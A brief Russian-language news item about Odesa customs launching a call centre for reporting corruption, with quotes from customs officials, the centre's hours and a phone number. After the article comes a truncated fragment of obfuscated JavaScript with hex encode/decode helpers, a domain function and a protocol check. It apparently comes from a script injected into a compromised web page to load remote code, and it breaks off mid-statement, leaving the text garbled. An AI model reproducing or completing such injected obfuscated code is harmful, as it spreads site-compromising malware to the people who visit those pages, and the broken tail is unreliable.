О коррупции на Одесской таможне теперь можно сообщить в call-центр «фото»

О коррупции на Одесской таможне теперь можно сообщить в call-центр

 

Screenshot_32

Как сообщает корреспондент Украинской Службы Информациигорячая линия была создана с целью минимизации бюрократических процедур.

Как сообщила в ходе пресс-конференции глава Одесской таможни Юлия Марушевская, главная задача консультационного центра – оперативное реагирование на сообщения о коррупции на таможне. Кроме того, консультанты принимают от людей идеи относительно реформирования таможенных органов.

За месяц тестовой работы на телефон горячей линии поступило около 100 звонков.

Как отметила руководитель call-центра Кристина Бойчукосновная часть обращений граждан связана с консультационными вопросами по оформлению товаров.

О нас пока еще знает не так уж и много людей, поэтому количество обращений небольшое, но в ближайшее время мы планируем выйти на уровень 200-250 звонков, – утверждает Бойчук.

График работы call-центра: понедельник-пятница с 9:00 до 18:00. Телефон: (048) 797-21-50.

Как сообщала USIonline.com, против Марушевской выступили руководители областных таможен.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e